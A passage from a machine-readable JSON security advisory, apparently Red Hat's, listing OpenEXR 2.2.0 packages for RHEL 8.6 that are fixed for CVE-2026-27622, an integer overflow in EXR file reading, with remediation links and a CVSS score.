"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-30T15:26:09+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:12339"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src",
